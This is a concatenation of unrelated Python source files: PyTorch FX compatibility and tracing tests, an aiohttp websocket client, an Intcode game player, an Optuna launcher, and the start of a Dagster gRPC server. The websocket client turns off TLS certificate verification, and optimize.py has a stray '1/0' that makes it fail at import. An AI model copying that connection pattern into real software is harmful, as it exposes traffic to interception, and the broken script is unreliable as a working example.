signature_strs.append(self._fn_to_stable_annotation_str(obj))
signature_strs.sort()
try:
self.assertExpected('\n'.join(signature_strs), 'fx_backcompat_function_signatures')
except AssertionError as e:
msg = f"{e}\n****** ERROR ******\nAn FX function that has been marked " \
f"as backwards-compatible has experienced a signature change. See the " \
f"above exception context for more information. If this change was " \
f"unintended, please revert it. If it was intended, check with the FX " \
f"team to ensure that the proper deprecation protocols have been followed " \
f"and subsequently --accept the change."
raise AssertionError(msg)
def test_class_member_back_compat(self):
"""
Test backward compatibility for members of classes with
@compatibility(is_backward_compatible=True). Currently this checks for
exact matches on the publicly visible members of the class.
"""
class_method_strs = []
for obj in _BACK_COMPAT_OBJECTS:
if isinstance(obj, type):
public_members = [name for name in obj.__dict__ if not name.startswith('_')]
class_method_strs.append(f'{torch.typename(obj)} {sorted(public_members)}')
class_method_strs.sort()
try:
self.assertExpected('\n'.join(class_method_strs), 'fx_backcompat_class_members')
except AssertionError as e:
msg = f"{e}\n****** ERROR ******\nAn FX class that has been marked " \
f"as backwards-compatible has experienced change in its public members. See the " \
f"above exception context for more information. If this change was " \
f"unintended, please revert it. If it was intended, check with the FX " \
f"team to ensure that the proper deprecation protocols have been followed " \
f"and subsequently --accept the change."
raise AssertionError(msg)
def test_public_api_surface(self):
non_back_compat_objects = {}
def check_symbols_have_bc_designation(m, prefix):
if not m.__name__.startswith('torch.fx'):
return
if m.__name__.startswith('torch.fx.experimental'):
return
for k, v in m.__dict__.items():
if v is m:
continue
if k.startswith('_'):
continue
if isinstance(v, types.ModuleType):
check_symbols_have_bc_designation(v, prefix + [k])
elif isinstance(v, type) or isinstance(v, types.FunctionType):
if v not in _MARKED_WITH_COMATIBLITY:
non_back_compat_objects.setdefault(v)
check_symbols_have_bc_designation(torch.fx, ['torch', 'fx'])
check_symbols_have_bc_designation(torch.fx.passes, ['torch', 'fx', 'passes'])
non_back_compat_strs = [torch.typename(obj) for obj in non_back_compat_objects.keys()]
# Only want objects in torch.fx
non_back_compat_strs = [
s for s in non_back_compat_strs if s.startswith('torch.fx') and not s.startswith('torch.fx.experimental')]
# Only want objects in public namespaces
non_back_compat_strs = [
s for s in non_back_compat_strs if all(not atom.startswith('_') for atom in s.split('.'))]
non_back_compat_strs.sort()
if len(non_back_compat_strs) != 0:
raise AssertionError(f"Public FX API(s) {non_back_compat_strs} introduced but not given a "
f"backwards-compatibility classification! Please decorate these "
f"API(s) with `@torch.fx._compatibility.compatibility` to specify "
f"BC guarantees.")
class TestFunctionalTracing(JitTestCase):
def setUp(self):
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
IGNORE_FUNCS = ("has_torch_function", "has_torch_function_unary",
"has_torch_function_variadic", "handle_torch_function",
"boolean_dispatch")
TO_PATCH = {"has_torch_function": None,
"has_torch_function_unary": None,
"has_torch_function_variadic": None}
BUILT_IN_FUNC = (AssertionError, "")
PROXY_ITERABLE = (TypeError, r"argument of type 'Proxy' is not iterable")
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
LEN_ERROR = (RuntimeError, r"'len' is not supported in symbolic tracing by default")
ARG_TYPE_MISMATCH = (TypeError, r", not Proxy$")
CONTROL_FLOW = (TraceError, r"symbolically traced variables cannot be used as inputs to control flow")
INTERPOLATE_ARGS_CONFLICT = (ValueError, r"only one of size or scale_factor should be defined")
MUTABLE = (RuntimeError, r"Tried to trace mutable operation")
UNTRACEABLE_FUNCTIONALS = {
"adaptive_avg_pool1d": BUILT_IN_FUNC,
"avg_pool1d": BUILT_IN_FUNC,
"avg_pool2d": BUILT_IN_FUNC,
"avg_pool3d": BUILT_IN_FUNC,
"bilinear": BUILT_IN_FUNC,
"celu_": BUILT_IN_FUNC,
"channel_shuffle": BUILT_IN_FUNC,
"native_channel_shuffle": BUILT_IN_FUNC,
"conv1d": BUILT_IN_FUNC,
"conv2d": BUILT_IN_FUNC,
"conv3d": BUILT_IN_FUNC,
"conv_tbc": BUILT_IN_FUNC,
"conv_transpose1d": BUILT_IN_FUNC,
"conv_transpose2d": BUILT_IN_FUNC,
"conv_transpose3d": BUILT_IN_FUNC,
"cosine_similarity": BUILT_IN_FUNC,
"elu_": BUILT_IN_FUNC,
"gelu": BUILT_IN_FUNC,
"hardshrink": BUILT_IN_FUNC,
"hardtanh_": BUILT_IN_FUNC,
"leaky_relu_": BUILT_IN_FUNC,
"linear": BUILT_IN_FUNC,
"logsigmoid": BUILT_IN_FUNC,
"one_hot": BUILT_IN_FUNC,
"pairwise_distance": BUILT_IN_FUNC,
"pdist": BUILT_IN_FUNC,
"pixel_shuffle": BUILT_IN_FUNC,
"pixel_unshuffle": BUILT_IN_FUNC,
"prelu": BUILT_IN_FUNC,
"relu_": BUILT_IN_FUNC,
"rrelu_": BUILT_IN_FUNC,
"selu_": BUILT_IN_FUNC,
"softplus": BUILT_IN_FUNC,
"softshrink": BUILT_IN_FUNC,
"threshold_": BUILT_IN_FUNC,
"adaptive_avg_pool2d": LEN_ERROR,
"adaptive_avg_pool3d": LEN_ERROR,
"adaptive_max_pool2d_with_indices": LEN_ERROR,
"adaptive_max_pool3d_with_indices": LEN_ERROR,
"instance_norm": CONTROL_FLOW,
"pad": LEN_ERROR,
"adaptive_max_pool1d": PROXY_ITERABLE,
"adaptive_max_pool2d": PROXY_ITERABLE,
"adaptive_max_pool3d": PROXY_ITERABLE,
"fractional_max_pool2d": PROXY_ITERABLE,
"fractional_max_pool3d": PROXY_ITERABLE,
"max_pool1d": PROXY_ITERABLE,
"max_pool2d": PROXY_ITERABLE,
"max_pool3d": PROXY_ITERABLE,
"group_norm": PROXY_ITERATED,
"lp_pool2d": PROXY_ITERATED,
"max_unpool1d": PROXY_ITERATED,
"max_unpool2d": PROXY_ITERATED,
"max_unpool3d": PROXY_ITERATED,
"adaptive_max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"layer_norm": ARG_TYPE_MISMATCH,
"lp_pool1d": ARG_TYPE_MISMATCH,
"affine_grid": CONTROL_FLOW,
"alpha_dropout": CONTROL_FLOW,
"batch_norm": CONTROL_FLOW,
"binary_cross_entropy": CONTROL_FLOW,
"binary_cross_entropy_with_logits": CONTROL_FLOW,
"celu": CONTROL_FLOW,
"cosine_embedding_loss": CONTROL_FLOW,
"cross_entropy": CONTROL_FLOW,
"ctc_loss": CONTROL_FLOW,
"dropout": CONTROL_FLOW,
"dropout2d": CONTROL_FLOW,
"dropout3d": CONTROL_FLOW,
"elu": CONTROL_FLOW,
"embedding": CONTROL_FLOW,
"embedding_bag": CONTROL_FLOW,
"feature_alpha_dropout": CONTROL_FLOW,
"fold": CONTROL_FLOW,
"gaussian_nll_loss": CONTROL_FLOW,
"glu": CONTROL_FLOW,
"grid_sample": CONTROL_FLOW,
"gumbel_softmax": CONTROL_FLOW,
"hardsigmoid": CONTROL_FLOW,
"hardswish": CONTROL_FLOW,
"hardtanh": CONTROL_FLOW,
"hinge_embedding_loss": CONTROL_FLOW,
"huber_loss": CONTROL_FLOW,
"interpolate": CONTROL_FLOW,
"kl_div": CONTROL_FLOW,
"l1_loss": CONTROL_FLOW,
"leaky_relu": CONTROL_FLOW,
"local_response_norm": CONTROL_FLOW,
"margin_ranking_loss": CONTROL_FLOW,
"max_pool1d_with_indices": CONTROL_FLOW,
"max_pool2d_with_indices": CONTROL_FLOW,
"max_pool3d_with_indices": CONTROL_FLOW,
"mse_loss": CONTROL_FLOW,
"multi_head_attention_forward": CONTROL_FLOW,
"multi_margin_loss": CONTROL_FLOW,
"multilabel_margin_loss": CONTROL_FLOW,
"multilabel_soft_margin_loss": CONTROL_FLOW,
"nll_loss": CONTROL_FLOW,
"poisson_nll_loss": CONTROL_FLOW,
"relu": CONTROL_FLOW,
"relu6": CONTROL_FLOW,
"rrelu": CONTROL_FLOW,
"selu": CONTROL_FLOW,
"silu": CONTROL_FLOW,
"mish": CONTROL_FLOW,
"smooth_l1_loss": CONTROL_FLOW,
"soft_margin_loss": CONTROL_FLOW,
"threshold": CONTROL_FLOW,
"triplet_margin_loss": CONTROL_FLOW,
"triplet_margin_with_distance_loss": CONTROL_FLOW,
"unfold": CONTROL_FLOW,
"upsample": CONTROL_FLOW,
"upsample_bilinear": INTERPOLATE_ARGS_CONFLICT,
"upsample_nearest": INTERPOLATE_ARGS_CONFLICT,
"normalize" : MUTABLE,
}
# List of nn.functionals with Tensor inputs but not with type annotation
FUNCTIONALS_WITHOUT_ANNOTATION = (
"adaptive_max_pool1d",
"adaptive_max_pool2d",
"adaptive_max_pool3d",
"fractional_max_pool2d",
"fractional_max_pool3d",
"max_pool1d",
"max_pool2d",
"max_pool3d",
"gaussian_nll_loss",
"upsample",
"upsample_bilinear",
"upsample_nearest",
)
# Inconsistent behavior between Python 3.8 and other Python versions:
# - Python 3.8+: Re-raise internal exception like `PROXY_ITERATED`
# - Other Python: Raise `argument of type 'Proxy' is not iterable` due to the same
# internal exception above
# Use the following map to override the expected exception for Python 3.8
UNTRACEABLE_FUNCTIONALS_PY38 = {
"adaptive_max_pool1d": PROXY_ITERATED,
"adaptive_max_pool2d": PROXY_ITERATED,
"adaptive_max_pool3d": PROXY_ITERATED,
"fractional_max_pool2d": PROXY_ITERATED,
"fractional_max_pool3d": PROXY_ITERATED,
"max_pool1d": PROXY_ITERATED,
"max_pool2d": PROXY_ITERATED,
"max_pool3d": PROXY_ITERATED,
"group_norm": LEN_ERROR
}
@classmethod
def _get_functional(cls):
functional_list = []
for f in dir(torch.nn.functional):
if not f.islower():
continue
# Ignore internal functions
if f.startswith('_'):
continue
# Ignore supporting functions
if f in cls.IGNORE_FUNCS:
continue
fn = getattr(torch.nn.functional, f)
# Ignore non-callable object like modules
if not isinstance(fn, Callable):
continue
if f not in cls.FUNCTIONALS_WITHOUT_ANNOTATION:
try:
sig = inspect.signature(fn)
has_tensor_arg = False
for arg, param in sig.parameters.items():
if isinstance(param.annotation, type) and issubclass(param.annotation, torch.Tensor):
has_tensor_arg = True
if not has_tensor_arg:
continue
# No signature or Object is not supported
except ValueError:
pass
functional_list.append((f, fn))
return functional_list
@classmethod
def generate_test_func(cls, func_name, fn):
def functional_test(self):
if func_name in self.UNTRACEABLE_FUNCTIONALS_PY38 and \
sys.version_info >= (3, 8) and sys.version_info < (3, 10):
exc, err = self.UNTRACEABLE_FUNCTIONALS_PY38[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
elif func_name in self.UNTRACEABLE_FUNCTIONALS:
exc, err = self.UNTRACEABLE_FUNCTIONALS[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
else:
symbolic_trace(fn)
return functional_test
@classmethod
def generate_tests(cls):
functional_list = cls._get_functional()
for func_name, fn in functional_list:
test_name = "test_nn_functional_" + func_name
functional_test = cls.generate_test_func(func_name, fn)
setattr(cls, test_name, functional_test)
@classmethod
def setUpClass(cls):
def no(*args, **kwargs):
return False
for name in cls.TO_PATCH.keys():
cls.TO_PATCH[name] = getattr(torch.nn.functional, name)
setattr(torch.nn.functional, name, no)
@classmethod
def tearDownClass(cls):
for name in cls.TO_PATCH.keys():
setattr(torch.nn.functional, name, cls.TO_PATCH[name])
TestFunctionalTracing.generate_tests()
instantiate_device_type_tests(TestOperatorSignatures, globals())
@skipIfNoTorchVision
class TestVisionTracing(JitTestCase):
def setUp(self):
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
INCONSISTENT_TYPE = (
RuntimeError,
r"Return value was annotated as having type __torch__.torchvision.models[.\w]+ but is actually of type Tensor"
)
UNTRACEABLE_MODELS = {
"fasterrcnn_resnet50_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_320_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_fpn": PROXY_ITERATED,
"maskrcnn_resnet50_fpn": PROXY_ITERATED,
"keypointrcnn_resnet50_fpn": PROXY_ITERATED,
"retinanet_resnet50_fpn": PROXY_ITERATED,
}
UNSCRIPTABLE_MODELS = {
"googlenet": INCONSISTENT_TYPE,
"inception_v3": INCONSISTENT_TYPE,
}
output_transform = {
"fcn_resnet50": lambda x: x["out"],
"fcn_resnet101": lambda x: x["out"],
"deeplabv3_resnet50": lambda x: x["out"],
"deeplabv3_resnet101": lambda x: x["out"],
"deeplabv3_mobilenet_v3_large": lambda x: x["out"],
"lraspp_mobilenet_v3_large": lambda x: x["out"],
"fasterrcnn_resnet50_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_320_fpn": lambda x: x[1],
"maskrcnn_resnet50_fpn": lambda x: x[1],
"keypointrcnn_resnet50_fpn": lambda x: x[1],
"retinanet_resnet50_fpn": lambda x: x[1],
}
@classmethod
def generate_test_fn(cls, name, model_fn, x, kwargs):
def run_test(self):
model = model_fn(**kwargs)
model = model.eval()
if name in self.UNTRACEABLE_MODELS:
err, exc = self.UNTRACEABLE_MODELS[name]
with self.assertRaisesRegex(err, exc):
graph = symbolic_trace(model)
else:
out_transform = self.output_transform.get(name, lambda x: x)
graph : torch.fx.GraphModule = symbolic_trace(model)
a = out_transform(model(x))
b = out_transform(graph(x))
self.assertEqual(a, b)
if name in self.UNSCRIPTABLE_MODELS:
err, exc = self.UNSCRIPTABLE_MODELS[name]
with self.assertRaisesRegex(err, exc):
script = torch.jit.script(graph)
else:
script = torch.jit.script(graph)
c = out_transform(script(x))
self.assertEqual(a, c)
return run_test
@classmethod
def generate_classification_tests(cls):
for k, v in torchvision_models.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_' + k
x = torch.rand(1, 3, 299, 299) if k in ['inception_v3'] else torch.rand(1, 3, 224, 224)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_segmentation_tests(cls):
for k, v in torchvision_models.segmentation.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_segmentation_' + k
x = torch.rand(1, 3, 32, 32)
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_detection_tests(cls):
for k, v in torchvision_models.detection.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_detection_' + k
x = [torch.rand(3, 300, 300)]
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_video_tests(cls):
for k, v in torchvision_models.video.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_video_' + k
x = torch.rand(1, 3, 4, 112, 112)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_tests(cls):
cls.generate_classification_tests()
cls.generate_detection_tests()
cls.generate_segmentation_tests()
cls.generate_video_tests()
if HAS_TORCHVISION:
TestVisionTracing.generate_tests()
if __name__ == '__main__':
run_tests()
|
websocket_client.py
|
import json
import sys
import traceback
from datetime import datetime
from types import coroutine
from threading import Thread
from asyncio import (
get_event_loop,
set_event_loop,
run_coroutine_threadsafe,
AbstractEventLoop
)
from aiohttp import ClientSession, ClientWebSocketResponse
class WebsocketClient:
"""
针对各类Websocket API的异步客户端
* 重载unpack_data方法来实现数据解包逻辑
* 重载on_connected方法来实现连接成功回调处理
* 重载on_disconnected方法来实现连接断开回调处理
* 重载on_packet方法来实现数据推送回调处理
* 重载on_error方法来实现异常捕捉回调处理
"""
def __init__(self):
"""Constructor"""
self._active: bool = False
self._host: str = ""
self._session: ClientSession = ClientSession()
self._ws: ClientWebSocketResponse = None
self._loop: AbstractEventLoop = None
self._proxy: str = ""
self._ping_interval: int = 60 # 秒
self._header: dict = {}
self._last_sent_text: str = ""
self._last_received_text: str = ""
def init(
self,
host: str,
proxy_host: str = "",
proxy_port: int = 0,
ping_interval: int = 60,
header: dict = None
):
"""
初始化客户端
"""
self._host = host
self._ping_interval = ping_interval
if header:
self._header = header
if proxy_host and proxy_port:
self._proxy = f"http://{proxy_host}:{proxy_port}"
def start(self):
"""
启动客户端
连接成功后会自动调用on_connected回调函数,
请等待on_connected被调用后,再发送数据包。
"""
self._active = True
if not self._loop:
self._loop = get_event_loop()
start_event_loop(self._loop)
run_coroutine_threadsafe(self._run(), self._loop)
def stop(self):
"""
停止客户端。
"""
self._active = False
if self._ws:
coro = self._ws.close()
run_coroutine_threadsafe(coro, self._loop)
if self._loop and self._loop.is_running():
self._loop.stop()
def join(self):
"""
等待后台线程退出。
"""
pass
def send_packet(self, packet: dict):
"""
发送数据包字典到服务器。
如果需要发送非json数据,请重载实现本函数。
"""
if self._ws:
text: str = json.dumps(packet)
self._record_last_sent_text(text)
coro: coroutine = self._ws.send_str(text)
run_coroutine_threadsafe(coro, self._loop)
def unpack_data(self, data: str):
"""
对字符串数据进行json格式解包
如果需要使用json以外的解包格式,请重载实现本函数。
"""
return json.loads(data)
def on_connected(self):
"""连接成功回调"""
pass
def on_disconnected(self):
"""连接断开回调"""
pass
def on_packet(self, packet: dict):
"""收到数据回调"""
pass
def on_error(
self,
exception_type: type,
exception_value: Exception,
tb
) -> None:
"""触发异常回调"""
try:
print("WebsocketClient on error" + "-" * 10)
print(self.exception_detail(exception_type, exception_value, tb))
except Exception:
traceback.print_exc()
def exception_detail(
self,
exception_type: type,
exception_value: Exception,
tb
) -> str:
"""异常信息格式化"""
text = "[{}]: Unhandled WebSocket Error:{}\n".format(
datetime.now().isoformat(), exception_type
)
text += "LastSentText:\n{}\n".format(self._last_sent_text)
text += "LastReceivedText:\n{}\n".format(self._last_received_text)
text += "Exception trace: \n"
text += "".join(
traceback.format_exception(exception_type, exception_value, tb)
)
return text
async def _run(self):
"""
在事件循环中运行的主协程
"""
while self._active:
# 捕捉运行过程中异常
try:
# 发起Websocket连接
self._ws = await self._session.ws_connect(
self._host,
proxy=self._proxy,
verify_ssl=False
)
# 调用连接成功回调
self.on_connected()
# 持续处理收到的数据
async for msg in self._ws:
text: str = msg.data
self._record_last_received_text(text)
data: dict = self.unpack_data(text)
self.on_packet(data)
# 移除Websocket连接对象
self._ws = None
# 调用连接断开回调
self.on_disconnected()
# 处理捕捉到的异常
except Exception:
et, ev, tb = sys.exc_info()
self.on_error(et, ev, tb)
def _record_last_sent_text(self, text: str):
"""记录最近发出的数据字符串"""
self._last_sent_text = text[:1000]
def _record_last_received_text(self, text: str):
"""记录最近收到的数据字符串"""
self._last_received_text = text[:1000]
def start_event_loop(loop: AbstractEventLoop) -> AbstractEventLoop:
"""启动事件循环"""
# 如果事件循环未运行,则创建后台线程来运行
if not loop.is_running():
thread = Thread(target=run_event_loop, args=(loop,))
thread.daemon = True
thread.start()
def run_event_loop(loop: AbstractEventLoop) -> None:
"""运行事件循环"""
set_event_loop(loop)
loop.run_forever()
|
part2.py
|
#!/usr/bin/env python3
import sys
from program import Program
from game import Game
import threading
import os
from time import sleep
SLEEP_DURATION = 0.01
def play(game):
while True:
game.update_state()
os.system("clear")
game.display()
if not game.is_running():
break
ball = game.get_ball_pos()
cursor = game.get_cursor_pos()
print(ball)
print(cursor)
if ball[0] > cursor[0]:
print("Move right")
game.move_right()
elif ball[0] < cursor[0]:
print("Move left")
game.move_left()
else:
print("Dont move")
game.dont_move()
sleep(SLEEP_DURATION)
def main():
data = sys.stdin.readline()
g = Game(Program(data, 1))
threads = [
threading.Thread(target=g.execute),
threading.Thread(target=lambda: play(g)),
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
if __name__ == "__main__":
main()
|
optimize.py
|
import argparse
import importlib.util
import os.path
import configparser
import optuna
from threading import Thread
from train.instantiate import *
from train.train import train
from multiprocessing import Process
from train.metrics import Accuracy
from dataset.mnist import get_mnist
import torch
1/0
parser = argparse.ArgumentParser(description='Quant tolls Optimizer')
parser.add_argument('-j','--jobs', type=int, default=4, metavar='j',
help='Threads to launch for this training')
parser.add_argument('-n','--n_tials', type=int, default=7, metavar='n',
help='Number of sampling to compute')
parser.add_argument('--gpus', type=str, default="",
help='gpus used for training - e.g 0,1,3 or 2')
parser.add_argument("-c", "--config_file", type=str, default="./config/optimize.conf", )
parser.add_argument("study_name", type=str, help="Study name to use for this optim")
parser.add_argument("model", type=str, help="Path to the model")
args = parser.parse_args()
#TODO look if the model name is on template folder.
# Load model
spec = importlib.util.spec_from_file_location(os.path.split(args.model)[-1], args.model)
model = importlib.util.module_from_spec(spec)
spec.loader.exec_module(model)
# Load config parser
#config = configparser.ConfigParser()
#config.read(args.config_file)
# setup work to do per thread
worker = [ {"device":None, "n_trials": args.n_tials//args.jobs} for _ in range(args.jobs)]
for index in range(args.n_tials%args.jobs):
worker[index]["n_trials"] +=1
# Setup device
if args.gpus =="":
# If no gpu setup only use cpu
for work in worker:
work["device"] = "cpu"
else:
gpus = args.gpus.split(",")
for index, work in enumerate(worker):
work["device"] = "cuda:{}".format(gpus[index%(len(gpus))])
def thread_main(device, nb_trial, job_index):
os.execlp("python3","python3","./utils/jobs/optimize.py", str(device), str(nb_trial), str(job_index), args.model, args.study_name)
jobs = [ Process(target=thread_main, args=(worker[index]["device"],worker[index]["n_trials"], index)) for index in range(args.jobs)]
for job in jobs:
job.start()
for job in jobs:
job.join()
"""
def thread_main(device, nb_trial, job_index):
def objectif(trial):
net = instantiate_model(model.Model, trial=trial)
data_params, opti_params = get_opti_from_model(model.Model, trial)
batch_size = data_params.get("batch_size",128)
valid_ratio = data_params.get("valid_ratio", 0.2)
max_epoch = data_params.get("epoch", 20)
learning_rate = opti_params.get("lr", 0.01)
decay_lr = opti_params.get("decay_lr", 0)
optimizer = opti_params.get("optimizer", torch.optim.Adam)
train_set, valid_set, _ = get_mnist(batch_size=batch_size, valid_ratio=valid_ratio, directory="/tmp/MNIST", transform_both=None, transform_train=None, transform_valid=None)
scheduled_lr = [learning_rate*((1-decay_lr)**index) for index in range(20)]
scheduled_opti_conf = {}
for index, lr in enumerate(scheduled_lr):
scheduled_opti_conf[index] = {"lr":lr}
print(scheduled_opti_conf)
print(device)
train(net, train_set, valid_set, device=device, save_path="/tmp/Optimize/job_{}".format(job_index), early_stopping=False,
opti=optimizer, loss=torch.nn.CrossEntropyLoss(), max_epoch=max_epoch,
static_opti_conf=None, scheduled_opti_conf=scheduled_opti_conf, accuracy_method=Accuracy(10))
return 0
study = optuna.create_study(study_name=args.study_name, load_if_exists=True)
study.optimize(objectif, n_trials=nb_trial)
jobs = [ Process(target=thread_main, args=(worker[index]["device"],worker[index]["n_trials"], index)) for index in range(args.jobs)]
for job in jobs:
job.start()
for job in jobs:
job.join()
"""
|
analysis.py
|
import math
import os
import sys
import time
from multiprocessing import Queue, Process, freeze_support
from predictor import Predictor, SingleSimPredictor
"""
Class responsible for simulation start over list of input files.
"""
class Analysis:
"""
args - collection of input arguments by argparse
"""
def __init__(self, args):
self._args = args
self._solutions = self.__collectSolutions()
"""
returns a list of solution objects
"""
def __collectSolutions(self):
solutions = []
for bnx in self._args.files:
if self._args.single_sim:
solutions.append(SingleSimPredictor(bnx, self._args))
else:
solutions.append(Predictor(bnx, self._args))
return solutions
"""
Starts simulation for each input file as a separate process.
"""
def store(self):
procs = []
for solution in self._solutions:
p = Process(target=solution.store)
procs.append((p,solution))
for p,s in procs:
p.start()
if self._args.verbose:
print("Solution %s started." % s.bnx())
for p,s in procs:
p.join()
if self._args.verbose:
print("Solution %s finished." % s.bnx())
print("Analysis finished!")
|
server.py
|
import math
import os
import queue
import sys
import threading
import time
import uuid
from collections import namedtuple
from concurrent.futures import ThreadPoolExecutor
import grpc
from dagster import check, seven
from dagster.core.code_pointer import CodePointer
from dagster.core.definitions.reconstructable import (
ReconstructableRepository,
repository_def_from_target_def,
)
from dagster.core.host_representation import ExternalPipelineOrigin, ExternalRepositoryOrigin
from dagster.core.host_representation.external_data import external_repository_data_from_def
from dagster.core.instance import DagsterInstance
from dagster.core.types.loadable_target_origin import LoadableTargetOrigin
from dagster.serdes import (
deserialize_json_to_dagster_namedtuple,
serialize_dagster_namedtuple,
whitelist_for_serdes,
)
from dagster.serdes.ipc import (
IPCErrorMessage,
ipc_write_stream,
open_ipc_subprocess,
read_unary_response,
)
from dagster.seven import multiprocessing
from dagster.utils import find_free_port, safe_tempfile_path_unmanaged
from dagster.utils.error import serializable_error_info_from_exc_info
from grpc_health.v1 import health, health_pb2, health_pb2_grpc
from .__generated__ import api_pb2
from .__generated__.api_pb2_grpc import DagsterApiServicer, add_DagsterApiServicer_to_server
from .impl import (
RunInSubprocessComplete,
StartRunInSubprocessSuccessful,
get_external_execution_plan_snapshot,
get_external_pipeline_subset_result,
get_external_schedule_execution,
get_external_sensor_execution,
get_partition_config,
get_partition_names,
get_partition_set_execution_param_data,
get_partition_tags,
start_run_in_subprocess,
)
from .types import (
CanCancelExecutionRequest,
CanCancelExecutionResult,
CancelExecutionRequest,
CancelExecutionResult,
ExecuteExternalPipelineArgs,
ExecutionPlanSnapshotArgs,
ExternalScheduleExecutionArgs,
GetCurrentImageResult,
ListRepositoriesResponse,
LoadableRepositorySymbol,
PartitionArgs,
PartitionNamesArgs,
PartitionSetExecutionParamArgs,
PipelineSubsetSnapshotArgs,
SensorExecutionArgs,
ShutdownServerResult,
StartRunResult,
)
from .utils import get_loadable_targets
EVENT_QUEUE_POLL_INTERVAL = 0.1
CLEANUP_TICK = 0.5
STREAMING_EXTERNAL_REPOSITORY_CHUNK_SIZE = 4000000
class CouldNotBindGrpcServerToAddress(Exception):
pass
class LazyRepositorySymbolsAndCodePointers:
"""Enables lazily loading user code at RPC-time so that it doesn't interrupt startup and
we can gracefully handle user code errors."""
def __init__(self, loadable_target_origin):
self._loadable_target_origin = loadable_target_origin
self._loadable_repository_symbols = None
self._code_pointers_by_repo_name = None
def load(self):
self._loadable_repository_symbols = load_loadable_repository_symbols(
self._loadable_target_origin
)
self._code_pointers_by_repo_name = build_code_pointers_by_repo_name(
self._loadable_target_origin, self._loadable_repository_symbols
)
@property
def loadable_repository_symbols(self):
if self._loadable_repository_symbols is None:
self.load()
return self._loadable_repository_symbols
@property
def code_pointers_by_repo_name(self):
if self._code_pointers_by_repo_name is None:
self.load()
return self._code_pointers_by_repo_name
def load_loadable_repository_symbols(loadable_target_origin):
if loadable_target_origin:
loadable_targets = get_loadable_targets(
loadable_target_origin.python_file,
loadable_target_origin.module_name,
loadable_target_origin.package_name,
loadable_target_origin.working_directory,
loadable_target_origin.attribute,
)
return [
LoadableRepositorySymbol(
attribute=loadable_target.attribute,
repository_name=repository_def_from_target_def(
loadable_target.target_definition
).name,
)
for loadable_target in loadable_targets
]
else:
return []
def build_code_pointers_by_repo_name(loadable_target_origin, loadable_repository_symbols):
repository_code_pointer_dict = {}
for loadable_repository_symbol in loadable_repository_symbols:
if loadable_target_origin.python_file:
repository_code_pointer_dict[
loadable_repository_symbol.repository_name
] = CodePointer.from_python_file(
loadable_target_origin.python_file,
loadable_repository_symbol.attribute,
loadable_target_origin.working_directory,
)
elif loadable_target_origin.package_name:
repository_code_pointer_dict[
loadable_repository_symbol.repository_name
] = CodePointer.from_python_package(
loadable_target_origin.package_name, loadable_repository_symbol.attribute,
)
else:
repository_code_pointer_dict[
loadable_repository_symbol.repository_name
] = CodePointer.from_module(
loadable_target_origin.module_name, loadable_repository_symbol.attribute,
)
return repository_code_pointer_dict
class DagsterApiServer(DagsterApiServicer):
# The loadable_target_origin is currently Noneable to support instaniating a server.
# This helps us test the ping methods, and incrementally migrate each method to
# the target passed in here instead of passing in a target in the argument.
def __init__(
self,
server_termination_event,
loadable_target_origin=None,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
fixed_server_id=None,
):
super(DagsterApiServer, self).__init__()
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
self._server_termination_event = check.inst_param(
server_termination_event, "server_termination_event", seven.ThreadingEventType
)
self._loadable_target_origin = check.opt_inst_param(
loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin
)
# Each server is initialized with a unique UUID. This UUID is used by clients to track when
# servers are replaced and is used for cache invalidation and reloading.
self._server_id = check.opt_str_param(fixed_server_id, "fixed_server_id", str(uuid.uuid4()))
# Client tells the server to shutdown by calling ShutdownServer (or by failing to send a
# hearbeat, at which point this event is set. The cleanup thread will then set the server
# termination event once all current executions have finished, which will stop the server)
self._shutdown_once_executions_finish_event = threading.Event()
# Dict[str, (multiprocessing.Process, DagsterInstance)]
self._executions = {}
# Dict[str, multiprocessing.Event]
self._termination_events = {}
self._termination_times = {}
self._execution_lock = threading.Lock()
self._repository_symbols_and_code_pointers = LazyRepositorySymbolsAndCodePointers(
loadable_target_origin
)
if not lazy_load_user_code:
self._repository_symbols_and_code_pointers.load()
self.__last_heartbeat_time = time.time()
if heartbeat:
